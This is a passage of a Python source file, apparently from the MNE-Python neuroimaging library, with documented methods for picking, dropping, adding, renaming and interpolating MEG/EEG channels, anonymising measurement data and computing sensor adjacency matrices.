Whether to display all channel names. If an array, only the channel
names in the array are shown. Defaults to False.
ch_groups : 'position' | array of shape (n_ch_groups, n_picks) | None
Channel groups for coloring the sensors. If None (default), default
coloring scheme is used. If 'position', the sensors are divided
into 8 regions. See ``order`` kwarg of :func:`mne.viz.plot_raw`. If
array, the channels are divided by picks given in the array.
.. versionadded:: 0.13.0
to_sphere : bool
Whether to project the 3d locations to a sphere. When False, the
sensor array appears similar as to looking downwards straight above
the subject's head. Has no effect when kind='3d'. Defaults to True.
.. versionadded:: 0.14.0
axes : instance of Axes | instance of Axes3D | None
Axes to draw the sensors to. If ``kind='3d'``, axes must be an
instance of Axes3D. If None (default), a new axes will be created.
.. versionadded:: 0.13.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False.
.. versionadded:: 0.13.0
show : bool
Show figure if True. Defaults to True.
%(topomap_sphere_auto)s
%(verbose_meth)s
Returns
-------
fig : instance of Figure
Figure containing the sensor topography.
selection : list
A list of selected channels. Only returned if ``kind=='select'``.
See Also
--------
mne.viz.plot_layout
Notes
-----
This function plots the sensor locations from the info structure using
matplotlib. For drawing the sensors using mayavi see
:func:`mne.viz.plot_alignment`.
.. versionadded:: 0.12.0
"""
from ..viz.utils import plot_sensors
return plot_sensors(self.info, kind=kind, ch_type=ch_type, title=title,
show_names=show_names, ch_groups=ch_groups,
to_sphere=to_sphere, axes=axes, block=block,
show=show, sphere=sphere, verbose=verbose)
@verbose
def anonymize(self, daysback=None, keep_his=False, verbose=None):
"""Anonymize measurement information in place.
Parameters
----------
%(anonymize_info_parameters)s
%(verbose)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
The modified instance.
Notes
-----
%(anonymize_info_notes)s
.. versionadded:: 0.13.0
"""
anonymize_info(self.info, daysback=daysback, keep_his=keep_his,
verbose=verbose)
self.set_meas_date(self.info['meas_date']) # unify annot update
return self
def set_meas_date(self, meas_date):
"""Set the measurement start date.
Parameters
----------
meas_date : datetime | float | tuple | None
The new measurement date.
If datetime object, it must be timezone-aware and in UTC.
A tuple of (seconds, microseconds) or float (alias for
``(meas_date, 0)``) can also be passed and a datetime
object will be automatically created. If None, will remove
the time reference.
Returns
-------
inst : instance of Raw | Epochs | Evoked
The modified raw instance. Operates in place.
See Also
--------
mne.io.Raw.anonymize
Notes
-----
If you want to remove all time references in the file, call
:func:`mne.io.anonymize_info(inst.info) <mne.io.anonymize_info>`
after calling ``inst.set_meas_date(None)``.
.. versionadded:: 0.20
"""
from ..annotations import _handle_meas_date
meas_date = _handle_meas_date(meas_date)
self.info['meas_date'] = meas_date
# clear file_id and meas_id if needed
if meas_date is None:
for key in ('file_id', 'meas_id'):
value = self.info.get(key)
if value is not None:
assert 'msecs' not in value
value['secs'] = DATE_NONE[0]
value['usecs'] = DATE_NONE[1]
# The following copy is needed for a test CTF dataset
# otherwise value['machid'][:] = 0 would suffice
_tmp = value['machid'].copy()
_tmp[:] = 0
value['machid'] = _tmp
if hasattr(self, 'annotations'):
self.annotations._orig_time = meas_date
return self
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR."""
@verbose
def pick_types(self, meg=None, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, dipole=False, gof=False, bio=False, ecog=False,
fnirs=False, csd=False, include=(), exclude='bads',
selection=None, verbose=None):
"""Pick some channels by type and names.
Parameters
----------
meg : bool | str
If True include MEG channels. If string it can be 'mag', 'grad',
'planar1' or 'planar2' to select only magnetometers, all
gradiometers, or a specific type of gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg : bool | str
If True include CTF / 4D reference channels. If 'auto', reference
channels are included if compensations are present and ``meg`` is
not False. Can also be the string options for the ``meg``
parameter.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can
be 'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
csd : bool
EEG-CSD channels.
include : list of str
List of additional channels to include. If empty do not include
any.
exclude : list of str | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of str
Restrict sensor channels (MEG, EEG) to this list of channel names.
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, dipole=dipole, gof=gof, bio=bio,
ecog=ecog, fnirs=fnirs, include=include, exclude=exclude,
selection=selection)
self._pick_drop_channels(idx)
# remove dropped channel types from reject and flat
if getattr(self, 'reject', None) is not None:
# use list(self.reject) to avoid RuntimeError for changing
# dictionary size during iteration
for ch_type in list(self.reject):
if ch_type not in self:
del self.reject[ch_type]
if getattr(self, 'flat', None) is not None:
for ch_type in list(self.flat):
if ch_type not in self:
del self.flat[ch_type]
return self
def pick_channels(self, ch_names, ordered=False):
"""Pick some channels.
Parameters
----------
ch_names : list
The list of channels to select.
ordered : bool
If True (default False), ensure that the order of the channels in
the modified instance matches the order of ``ch_names``.
.. versionadded:: 0.20.0
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
reorder_channels
Notes
-----
The channel names given are assumed to be a set, i.e. the order
does not matter. The original order of the channels is preserved.
You can use ``reorder_channels`` to set channel order if necessary.
.. versionadded:: 0.9.0
"""
picks = pick_channels(self.info['ch_names'], ch_names, ordered=ordered)
return self._pick_drop_channels(picks)
@fill_doc
def pick(self, picks, exclude=()):
"""Pick a subset of channels.
Parameters
----------
%(picks_all)s
exclude : list | str
Set of channels to exclude, only used when picking based on
types (e.g., exclude="bads" when picks="meg").
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
"""
picks = _picks_to_idx(self.info, picks, 'all', exclude,
allow_empty=False)
return self._pick_drop_channels(picks)
def reorder_channels(self, ch_names):
"""Reorder channels.
Parameters
----------
ch_names : list
The desired channel order.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
pick_channels
Notes
-----
Channel names must be unique. Channels that are not in ``ch_names``
are dropped.
.. versionadded:: 0.16.0
"""
_check_excludes_includes(ch_names)
idx = list()
for ch_name in ch_names:
ii = self.ch_names.index(ch_name)
if ii in idx:
raise ValueError('Channel name repeated: %s' % (ch_name,))
idx.append(ii)
return self._pick_drop_channels(idx)
def drop_channels(self, ch_names):
"""Drop channel(s).
Parameters
----------
ch_names : iterable or str
Iterable (e.g. list) of channel name(s) or channel name to remove.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
reorder_channels
pick_channels
pick_types
Notes
-----
.. versionadded:: 0.9.0
"""
if isinstance(ch_names, str):
ch_names = [ch_names]
try:
all_str = all([isinstance(ch, str) for ch in ch_names])
except TypeError:
raise ValueError("'ch_names' must be iterable, got "
"type {} ({}).".format(type(ch_names), ch_names))
if not all_str:
raise ValueError("Each element in 'ch_names' must be str, got "
"{}.".format([type(ch) for ch in ch_names]))
missing = [ch for ch in ch_names if ch not in self.ch_names]
if len(missing) > 0:
msg = "Channel(s) {0} not found, nothing dropped."
raise ValueError(msg.format(", ".join(missing)))
bad_idx = [self.ch_names.index(ch) for ch in ch_names
if ch in self.ch_names]
idx = np.setdiff1d(np.arange(len(self.ch_names)), bad_idx)
return self._pick_drop_channels(idx)
def _pick_drop_channels(self, idx):
# avoid circular imports
from ..io import BaseRaw
from ..time_frequency import AverageTFR, EpochsTFR
if not isinstance(self, BaseRaw):
_check_preload(self, 'adding, dropping, or reordering channels')
if getattr(self, 'picks', None) is not None:
self.picks = self.picks[idx]
if getattr(self, '_read_picks', None) is not None:
self._read_picks = [r[idx] for r in self._read_picks]
if hasattr(self, '_cals'):
self._cals = self._cals[idx]
pick_info(self.info, idx, copy=False)
if getattr(self, '_projector', None) is not None:
self._projector = self._projector[idx][:, idx]
# All others (Evoked, Epochs, Raw) have chs axis=-2
axis = -3 if isinstance(self, (AverageTFR, EpochsTFR)) else -2
if hasattr(self, '_data'): # skip non-preloaded Raw
self._data = self._data.take(idx, axis=axis)
else:
assert isinstance(self, BaseRaw) and not self.preload
self._pick_projs()
return self
def _pick_projs(self):
"""Keep only projectors which apply to at least 1 data channel."""
drop_idx = []
for idx, proj in enumerate(self.info['projs']):
if not set(self.info['ch_names']) & set(proj['data']['col_names']):
drop_idx.append(idx)
for idx in drop_idx:
logger.info(f"Removing projector {self.info['projs'][idx]}")
if drop_idx and hasattr(self, 'del_proj'):
self.del_proj(drop_idx)
return self
def add_channels(self, add_list, force_update_info=False):
"""Append new channels to the instance.
Parameters
----------
add_list : list
A list of objects to append to self. Must contain all the same
type as the current object.
force_update_info : bool
If True, force the info for objects to be appended to match the
values in ``self``. This should generally only be used when adding
stim channels for which important metadata won't be overwritten.
.. versionadded:: 0.12
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
Notes
-----
If ``self`` is a Raw instance that has been preloaded into a
:obj:`numpy.memmap` instance, the memmap will be resized.
"""
# avoid circular imports
from ..io import BaseRaw, _merge_info
from ..epochs import BaseEpochs
_validate_type(add_list, (list, tuple), 'Input')
# Object-specific checks
for inst in add_list + [self]:
_check_preload(inst, "adding channels")
if isinstance(self, BaseRaw):
con_axis = 0
comp_class = BaseRaw
elif isinstance(self, BaseEpochs):
con_axis = 1
comp_class = BaseEpochs
else:
con_axis = 0
comp_class = type(self)
for inst in add_list:
_validate_type(inst, comp_class, 'All input')
data = [inst._data for inst in [self] + add_list]
# Make sure that all dimensions other than channel axis are the same
compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
shapes = np.array([dat.shape for dat in data])[:, compare_axes]
for shape in shapes:
if not ((shapes[0] - shape) == 0).all():
raise AssertionError('All data dimensions except channels '
'must match, got %s != %s'
% (shapes[0], shape))
del shapes
# Create final data / info objects
infos = [self.info] + [inst.info for inst in add_list]
new_info = _merge_info(infos, force_update_to_first=force_update_info)
# Now update the attributes
if isinstance(self._data, np.memmap) and con_axis == 0 and \
sys.platform != 'darwin': # resizing not available--no mremap
# Use a resize and fill in other ones
out_shape = (sum(d.shape[0] for d in data),) + data[0].shape[1:]
n_bytes = np.prod(out_shape) * self._data.dtype.itemsize
self._data.flush()
self._data.base.resize(n_bytes)
self._data = np.memmap(self._data.filename, mode='r+',
dtype=self._data.dtype, shape=out_shape)
assert self._data.shape == out_shape
assert self._data.nbytes == n_bytes
offset = len(data[0])
for d in data[1:]:
this_len = len(d)
self._data[offset:offset + this_len] = d
offset += this_len
else:
self._data = np.concatenate(data, axis=con_axis)
self.info = new_info
if isinstance(self, BaseRaw):
self._cals = np.concatenate([getattr(inst, '_cals')
for inst in [self] + add_list])
# We should never use these since data are preloaded, let's just
# set it to something large and likely to break (2 ** 31 - 1)
extra_idx = [2147483647] * sum(info['nchan'] for info in infos[1:])
assert all(len(r) == infos[0]['nchan'] for r in self._read_picks)
self._read_picks = [
np.concatenate([r, extra_idx]) for r in self._read_picks]
assert all(len(r) == self.info['nchan'] for r in self._read_picks)
return self
class InterpolationMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def interpolate_bads(self, reset_bads=True, mode='accurate',
origin='auto', method=None, verbose=None):
"""Interpolate bad MEG and EEG channels.
Operates in place.
Parameters
----------
reset_bads : bool
If True, remove the bads from info.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used for interpolation of channels
using the minimum-norm method.
origin : array-like, shape (3,) | str
Origin of the sphere in the head coordinate frame and in meters.
Can be ``'auto'`` (default), which means a head-digitization-based
origin fit.
.. versionadded:: 0.17
method : dict
Method to use for each channel type.
Currently only the key "eeg" has multiple options:
- ``"spline"`` (default)
Use spherical spline interpolation.
- ``"MNE"``
Use minimum-norm projection to a sphere and back.
This is the method used for MEG channels.
The value for "meg" is "MNE", and the value for
"fnirs" is "nearest". The default (None) is thus an alias for::
method=dict(meg="MNE", eeg="spline", fnirs="nearest")
.. versionadded:: 0.21
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
Notes
-----
.. versionadded:: 0.9.0
"""
from ..bem import _check_origin
from .interpolation import _interpolate_bads_eeg,\
_interpolate_bads_meeg, _interpolate_bads_nirs
_check_preload(self, "interpolation")
method = _handle_default('interpolation_method', method)
for key in method:
_check_option('method[key]', key, ('meg', 'eeg', 'fnirs'))
_check_option("method['eeg']", method['eeg'], ('spline', 'MNE'))
_check_option("method['meg']", method['meg'], ('MNE',))
_check_option("method['fnirs']", method['fnirs'], ('nearest',))
if len(self.info['bads']) == 0:
warn('No bad channels to interpolate. Doing nothing...')
return self
logger.info('Interpolating bad channels')
origin = _check_origin(origin, self.info)
if method['eeg'] == 'spline':
_interpolate_bads_eeg(self, origin=origin)
eeg_mne = False
else:
eeg_mne = True
_interpolate_bads_meeg(self, mode=mode, origin=origin, eeg=eeg_mne)
_interpolate_bads_nirs(self)
if reset_bads is True:
self.info['bads'] = []
return self
@fill_doc
def rename_channels(info, mapping):
"""Rename channels.
.. warning:: The channel names must have at most 15 characters
Parameters
----------
info : dict
Measurement info to modify.
%(rename_channels_mapping)s
"""
_validate_type(info, Info, 'info')
info._check_consistency()
bads = list(info['bads']) # make our own local copies
ch_names = list(info['ch_names'])
# first check and assemble clean mappings of index and name
if isinstance(mapping, dict):
orig_names = sorted(list(mapping.keys()))
missing = [orig_name not in ch_names for orig_name in orig_names]
if any(missing):
raise ValueError("Channel name(s) in mapping missing from info: "
"%s" % np.array(orig_names)[np.array(missing)])
new_names = [(ch_names.index(ch_name), new_name)
for ch_name, new_name in mapping.items()]
elif callable(mapping):
new_names = [(ci, mapping(ch_name))
for ci, ch_name in enumerate(ch_names)]
else:
raise ValueError('mapping must be callable or dict, not %s'
% (type(mapping),))
# check we got all strings out of the mapping
for new_name in new_names:
_validate_type(new_name[1], 'str', 'New channel mappings')
bad_new_names = [name for _, name in new_names if len(name) > 15]
if len(bad_new_names):
raise ValueError('Channel names cannot be longer than 15 '
'characters. These channel names are not '
'valid : %s' % new_names)
# do the remapping locally
for c_ind, new_name in new_names:
for bi, bad in enumerate(bads):
if bad == ch_names[c_ind]:
bads[bi] = new_name
ch_names[c_ind] = new_name
# check that all the channel names are unique
if len(ch_names) != len(np.unique(ch_names)):
raise ValueError('New channel names are not unique, renaming failed')
# do the remapping in info
info['bads'] = bads
for ch, ch_name in zip(info['chs'], ch_names):
ch['ch_name'] = ch_name
info._update_redundant()
info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Unpack mat files in Python."""
if len(cell) > 0:
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
@fill_doc
def read_ch_adjacency(fname, picks=None):
"""Parse FieldTrip neighbors .mat file.
More information on these neighbor definitions can be found on the related
`FieldTrip documentation pages
<http://www.fieldtriptoolbox.org/template/neighbours/>`__.
Parameters
----------
fname : str
The file name. Example: 'neuromag306mag', 'neuromag306planar',
'ctf275', 'biosemi64', etc.
%(picks_all)s
Picks Must match the template.
Returns
-------
ch_adjacency : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The adjacency matrix.
ch_names : list
The list of channel names present in adjacency matrix.
See Also
--------
find_ch_adjacency
Notes
-----
This function is closely related to :func:`find_ch_adjacency`. If you
don't know the correct file for the neighbor definitions,
:func:`find_ch_adjacency` can compute the adjacency matrix from 2d
sensor locations.
"""
from scipy.io import loadmat
if not op.isabs(fname):
templates_dir = op.realpath(op.join(op.dirname(__file__),
'data', 'neighbors'))
templates = os.listdir(templates_dir)
for f in templates:
if f == fname:
break
if f == fname + '_neighb.mat':
fname += '_neighb.mat'
break
else:
raise ValueError('I do not know about this neighbor '
'template: "{}"'.format(fname))
fname = op.join(templates_dir, fname)
nb = loadmat(fname)['neighbours']
ch_names = _recursive_flatten(nb['label'], str)
picks = _picks_to_idx(len(ch_names), picks)
neighbors = [_recursive_flatten(c, str) for c in
nb['neighblabel'].flatten()]
assert len(ch_names) == len(neighbors)
adjacency = _ch_neighbor_adjacency(ch_names, neighbors)
# picking before constructing matrix is buggy
adjacency = adjacency[picks][:, picks]
ch_names = [ch_names[p] for p in picks]
return adjacency, ch_names
def _ch_neighbor_adjacency(ch_names, neighbors):
"""Compute sensor adjacency matrix.
Parameters
----------
ch_names : list of str
The channel names.
neighbors : list of list
A list of list of channel names. The neighbors to
which the channels in ch_names are connected with.
Must be of the same length as ch_names.
Returns
-------
ch_adjacency : scipy.sparse matrix
The adjacency matrix.
"""
if len(ch_names) != len(neighbors):
raise ValueError('`ch_names` and `neighbors` must '
'have the same length')
set_neighbors = {c for d in neighbors for c in d}
rest = set_neighbors - set(ch_names)
if len(rest) > 0:
raise ValueError('Some of your neighbors are not present in the '
'list of channel names')
for neigh in neighbors:
if (not isinstance(neigh, list) and
not all(isinstance(c, str) for c in neigh)):
raise ValueError('`neighbors` must be a list of lists of str')
ch_adjacency = np.eye(len(ch_names), dtype=bool)
for ii, neigbs in enumerate(neighbors):
ch_adjacency[ii, [ch_names.index(i) for i in neigbs]] = True
ch_adjacency = sparse.csr_matrix(ch_adjacency)
return ch_adjacency
def find_ch_adjacency(info, ch_type):
"""Find the adjacency matrix for the given channels.
This function tries to infer the appropriate adjacency matrix template
for the given channels. If a template is not found, the adjacency matrix
is computed using Delaunay triangulation based on 2d sensor locations.
Parameters
----------
info : instance of Info
The measurement info.
ch_type : str | None
The channel type for computing the adjacency matrix. Currently
supports 'mag', 'grad', 'eeg' and None. If None, the info must contain
only one channel type.
Returns
-------
ch_adjacency : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The adjacency matrix.
ch_names : list
The list of channel names present in adjacency matrix.
See Also
--------
read_ch_adjacency
Notes
-----
.. versionadded:: 0.15
Automatic detection of an appropriate adjacency matrix template only
works for MEG data at the moment. This means that the adjacency matrix
is always computed for EEG data and never loaded from a template file. If
you want to load a template for a given montage use
:func:`read_ch_adjacency` directly.
"""
if ch_type is None:
picks = channel_indices_by_type(info)
if sum([len(p) != 0 for p in picks.values()]) != 1:
raise ValueError('info must contain only one channel type if '
'ch_type is None.')
ch_type = channel_type(info, 0)
else:
_check_option('ch_type', ch_type, ['mag', 'grad', 'eeg'])
(has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only,
has_neuromag_122_grad, has_csd_coils) = _get_ch_info(info)
conn_name = None
if has_vv_mag and ch_type == 'mag':
conn_name = 'neuromag306mag'
elif has_vv_grad and ch_type == 'grad':
conn_name = 'neuromag306planar'
elif has_neuromag_122_grad:
conn_name = 'neuromag122'
elif has_4D_mag:
if 'MEG 248' in info['ch_names']:
idx = info['ch_names'].index('MEG 248')
grad = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_GRAD
mag = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG
if ch_type == 'grad' and grad:
conn_name = 'bti248grad'
elif ch_type == 'mag' and mag:
conn_name = 'bti248'
elif 'MEG 148' in info['ch_names'] and ch_type == 'mag':
idx = info['ch_names'].index('MEG 148')
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG:
conn_name = 'bti148'
elif has_CTF_grad and ch_type == 'mag':
if info['nchan'] < 100:
conn_name = 'ctf64'
elif info['nchan'] > 200:
conn_name = 'ctf275'
else:
conn_name = 'ctf151'
elif n_kit_grads > 0:
from ..io.kit.constants import KIT_NEIGHBORS
conn_name = KIT_NEIGHBORS.get(info['kit_system_id'])
if conn_name is not None:
logger.info('Reading adjacency matrix for %s.' % conn_name)
return read_ch_adjacency(conn_name)
logger.info('Could not find a adjacency matrix for the data. '
'Computing adjacency based on Delaunay triangulations.')
return _compute_ch_adjacency(info, ch_type)
def _compute_ch_adjacency(info, ch_type):
"""Compute channel adjacency matrix using Delaunay triangulations.
Parameters
----------
info : instance of mne.measuerment_info.Info
The measurement info.
ch_type : str
The channel type for computing the adjacency matrix. Currently
supports 'mag', 'grad' and 'eeg'.
Returns
-------
ch_adjacency : scipy.sparse matrix, shape (n_channels, n_channels)
The adjacency matrix.
ch_names : list
The list of channel names present in adjacency matrix.
"""
from scipy.spatial import Delaunay
from .. import spatial_tris_adjacency
from ..channels.layout import _find_topomap_coords, _pair_grad_sensors
combine_grads = (ch_type == 'grad' and FIFF.FIFFV_COIL_VV_PLANAR_T1 in
np.unique([ch['coil_type'] for ch in info['chs']]))
picks = dict(_picks_by_type(info, exclude=[]))[ch_type]
ch_names = [info['ch_names'][pick] for pick in picks]
if combine_grads:
pairs = _pair_grad_sensors(info, topomap_coords=False, exclude=[])
if len(pairs) != len(picks):
raise RuntimeError('Cannot find a pair for some of the '
'gradiometers. Cannot compute adjacency '
'matrix.')
# only for one of the pair
xy = _find_topomap_coords(info, picks[::2], sphere=HEAD_SIZE_DEFAULT)
else:
xy = _find_topomap_coords(info, picks, sphere=HEAD_SIZE_DEFAULT)
tri = Delaunay(xy)
neighbors = spatial_tris_adjacency(tri.simplices)
if combine_grads:
ch_adjacency = np.eye(len(picks), dtype=bool)
for idx, neigbs in zip(neighbors.row, neighbors.col):
for ii in range(2): # make sure each pair is included
for jj in range(2):
ch_adjacency[idx * 2 + ii, neigbs * 2 + jj] = True
ch_adjacency[idx * 2 + ii, idx * 2 + jj] = True # pair
ch_adjacency = sparse.csr_matrix(ch_adjacency)
else:
ch_adjacency = sparse.lil_matrix(neighbors)
ch_adjacency.setdiag(np.repeat(1, ch_adjacency.shape[0]))
ch_adjacency = ch_adjacency.tocsr()
return ch_adjacency, ch_names
def fix_mag_coil_types(info, use_cal=False):
"""Fix magnetometer coil types.
Parameters
----------
info : dict
The info dict to correct. Corrections are done in-place.
use_cal : bool
If True, further refine the check for old coil types by checking
``info['chs'][ii]['cal']``.
Notes
-----
This function changes magnetometer coil types 3022 (T1: SQ20483N) and
3023 (T2: SQ20483-A) to 3024 (T3: SQ20950N) in the channel definition
records in the info structure.
Neuromag Vectorview systems can contain magnetometers with two
different coil sizes (3022 and 3023 vs. 3024). The systems
incorporating coils of type 3024 were introduced last and are used at
the majority of MEG sites. At some sites with 3024 magnetometers,
the data files have still defined the magnetometers to be of type
3022 to ensure compatibility with older versions of Neuromag software.
In the MNE software as well as in the present version of Neuromag
software coil type 3024 is fully supported. Therefore, it is now safe
to upgrade the data files to use the true coil type.
.. note:: The effect of the difference between the coil sizes on the
current estimates computed by the MNE software is very small.
Therefore the use of ``fix_mag_coil_types`` is not mandatory.
"""
old_mag_inds = _get_T1T2_mag_inds(info, use_cal)
for ii in old_mag_inds:
info['chs'][ii]['coil_type'] = FIFF.FIFFV_COIL_VV_MAG_T3
logger.info('%d of %d magnetometer types replaced with T3.' %
(len(old_mag_inds), len(pick_types(info, meg='mag'))))
info._check_consistency()
def _get_T1T2_mag_inds(info, use_cal=False):
"""Find T1/T2 magnetometer coil types."""
picks = pick_types(info, meg='mag')
old_mag_inds = []
# From email exchanges, systems with the larger T2 coil only use the cal
# value of 2.09e-11. Newer T3 magnetometers use 4.13e-11 or 1.33e-10
# (Triux). So we can use a simple check for > 3e-11.
for ii in picks:
ch = info['chs'][ii]
if ch['coil_type'] in (FIFF.FIFFV_COIL_VV_MAG_T1,
FIFF.FIFFV_COIL_VV_MAG_T2):
if use_cal:
if ch['cal'] > 3e-11:
old_mag_inds.append(ii)
else:
old_mag_inds.append(ii)
return old_mag_inds
def _get_ch_info(info):
"""Get channel info for inferring acquisition device."""
chs = info['chs']
# Only take first 16 bits, as higher bits store CTF comp order
coil_types = {ch['coil_type'] & 0xFFFF for ch in chs}
channel_types = {ch['kind'] for ch in chs}
has_vv_mag = any(k in coil_types for k in
[FIFF.FIFFV_COIL_VV_MAG_T1, FIFF.FIFFV_COIL_VV_MAG_T2,
FIFF.FIFFV_COIL_VV_MAG_T3])
has_vv_grad = any(k in coil_types for k in [FIFF.FIFFV_COIL_VV_PLANAR_T1,
FIFF.FIFFV_COIL_VV_PLANAR_T2,
FIFF.FIFFV_COIL_VV_PLANAR_T3])
has_neuromag_122_grad = any(k in coil_types
for k in [FIFF.FIFFV_COIL_NM_122])
is_old_vv = ' ' in chs[0]['ch_name']
has_4D_mag = FIFF.FIFFV_COIL_MAGNES_MAG in coil_types
ctf_other_types = (FIFF.FIFFV_COIL_CTF_REF_MAG,
FIFF.FIFFV_COIL_CTF_REF_GRAD,
FIFF.FIFFV_COIL_CTF_OFFDIAG_REF_GRAD)
has_CTF_grad = (FIFF.FIFFV_COIL_CTF_GRAD in coil_types or
(FIFF.FIFFV_MEG_CH in channel_types and
any(k in ctf_other_types for k in coil_types)))
# hack due to MNE-C bug in IO of CTF
# only take first 16 bits, as higher bits store CTF comp order
n_kit_grads = sum(ch['coil_type'] & 0xFFFF == FIFF.FIFFV_COIL_KIT_GRAD
for ch in chs)
has_any_meg = any([has_vv_mag, has_vv_grad, has_4D_mag, has_CTF_grad,
n_kit_grads])
has_eeg_coils = (FIFF.FIFFV_COIL_EEG in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
has_eeg_coils_and_meg = has_eeg_coils and has_any_meg
has_eeg_coils_only = has_eeg_coils and not has_any_meg
has_csd_coils = (FIFF.FIFFV_COIL_EEG_CSD in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
return (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only, has_neuromag_122_grad,
has_csd_coils)
def make_1020_channel_selections(info, midline="z"):
"""Return dict mapping from ROI names to lists of picks for 10/20 setups.
This passes through all channel names, and uses a simple heuristic to
separate channel names into three Region of Interest-based selections:
Left, Midline and Right. The heuristic is that channels ending on any of
the characters in ``midline`` are filed under that heading, otherwise those
ending in odd numbers under "Left", those in even numbers under "Right".
Other channels are ignored. This is appropriate for 10/20 files, but not
for other channel naming conventions.
If an info object is provided, lists are sorted from posterior to anterior.
Parameters
----------
info : instance of Info
Where to obtain the channel names from. The picks will
be in relation to the position in ``info["ch_names"]``. If possible,
this lists will be sorted by y value position of the channel locations,
i.e., from back to front.
midline : str
Names ending in any of these characters are stored under the
``Midline`` key. Defaults to 'z'. Note that capitalization is ignored.
Returns
-------
selections : dict
A dictionary mapping from ROI names to lists of picks (integers).
"""
_validate_type(info, "info")
try:
from .layout import find_layout
layout = find_layout(info)
pos = layout.pos
ch_names = layout.names
except RuntimeError: # no channel positions found
ch_names = info["ch_names"]
pos = None
selections = dict(Left=[], Midline=[], Right=[])
for pick, channel in enumerate(ch_names):
last_char = channel[-1].lower() # in 10/20, last char codes hemisphere
if last_char in midline:
selection = "Midline"
elif last_char.isdigit():
selection = "Left" if int(last_char) % 2 else "Right"
else: # ignore the channel
continue
selections[selection].append(pick)
if pos is not None:
# sort channels from front to center
# (y-coordinate of the position info in the layout)
selections = {selection: np.array(picks)[pos[picks, 1].argsort()]
for selection, picks in selections.items()}
return selections
def combine_channels(inst, groups, method='mean', keep_stim=False,
drop_bad=False):
"""Combine channels based on specified channel grouping.
Parameters
----------
inst : instance of Raw, Epochs, or Evoked
An MNE-Python object to combine the channels for. The object can be of
type Raw, Epochs, or Evoked.
groups : dict
Specifies which channels are aggregated into a single channel, with
aggregation method determined by the ``method`` parameter. One new
pseudo-channel is made per dict entry; the dict values must be lists of
picks (integer indices of ``ch_names``). For example::
groups=dict(Left=[1, 2, 3, 4], Right=[5, 6, 7, 8])
Note that within a dict entry all channels must have the same type.
method : str | callable
Which method to use to combine channels. If a :class:`str`, must be one
of 'mean', 'median', or 'std' (standard deviation). If callable, the
callable must accept one positional input (data of shape ``(n_channels,
n_times)``, or ``(n_epochs, n_channels, n_times)``) and return an
:class:`array <numpy.ndarray>` of shape ``(n_times,)``, or ``(n_epochs,
n_times)``. For example with an instance of Raw or Evoked::
method = lambda data: np.mean(data, axis=0)
Another example with an instance of Epochs::
method = lambda data: np.median(data, axis=1)
Defaults to ``'mean'``.
keep_stim : bool
If ``True``, include stimulus channels in the resulting object.
Defaults to ``False``.
drop_bad : bool
If ``True``, drop channels marked as bad before combining. Defaults to
``False``.
Returns
-------
combined_inst : instance of Raw, Epochs, or Evoked
An MNE-Python object of the same type as the input ``inst``, containing
one virtual channel for each group in ``groups`` (and, if ``keep_stim``
is ``True``, also containing stimulus channels).
"""
from ..io import BaseRaw, RawArray
from .. import BaseEpochs, EpochsArray, Evoked, EvokedArray
ch_axis = 1 if isinstance(inst, BaseEpochs) else 0
ch_idx = list(range(inst.info['nchan']))
ch_names = inst.info['ch_names']
ch_types = inst.get_channel_types()
inst_data = inst.data if isinstance(inst, Evoked) else inst.get_data()
groups = OrderedDict(deepcopy(groups))
# Convert string values of ``method`` into callables
